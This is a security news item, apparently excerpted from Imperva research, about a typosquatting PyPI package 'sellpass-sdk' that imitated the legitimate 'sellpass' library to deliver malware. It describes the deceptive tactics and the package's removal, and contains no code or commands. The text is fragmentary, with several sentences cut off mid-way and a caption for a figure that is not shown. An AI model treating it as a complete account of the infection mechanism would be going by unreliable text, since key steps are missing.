Python Package Index is a platform that offers an extensive range of packages to simplify and enhance the development process.
Malicious actors regularly upload phishing packages in the platform's repository aimed at delivering malware to steal the victim's information, or more frequently, to compromise their environment.
Recently, several packages from the PyPI were reported for being part of supply chain attacks.
As part of our continuous research to improve the security of the Internet, Imperva Threat Research discovered and reported a package called 'sellpass-sdk' that followed a burst of other dummy malicious packages, most likely posted as tests by the same author.
After we reported this discovery, the PyPI team quickly removed the package.
The malicious package was added to the PyPI repository on December 27, 2023 and remained there until January 8, when it was taken down following our report to the PyPI security team.
This package seemed to be masquerading as an uninfected one named 'sellpass'.
The authentic 'sellpass' package serves as a Python wrapper for the API of Sellpass.io.
The tactics used by the author of this malicious package were interesting and designed to exploit the trust of potential users.
Figure 2: Original package's author vs. the malicious.
Uploading Several Versions to Increase Perceived Legitimacy: The author uploaded two versions of the package, 'sellpass-sdk-1.0.tar.
Users often perceive packages with multiple versions as more credible and actively maintained, which increases the likelihood of download and use.
Libraries.io provides a scoring system for all PyPI packages in order to evaluate their quality.
Replicate Information from the Original Package: Adding basic information that is directly copied from the original package is another deceptive tactic.
This not only adds a layer of authenticity, but it also misleads users into thinking that the package is genuine and safe.
By using these techniques, the package was available on PyPI for 13 days, and had almost 500 downloads, before we reported it.
Among them were packages similar to the 'ef323refefeffe' package, as detailed in Socket's recent blog post, and others that employed a binary file to carry out the infection.
Our detection system spotted this package due to several indicators.
When a user downloads and installs the package as a component of their project, the setup.
Users must double-check package names, authors, and other metadata, especially when dealing with critical or sensitive projects.
This Cyber News was published on www.imperva.com. Publication date: Thu, 11 Jan 2024 18:13:03 +0000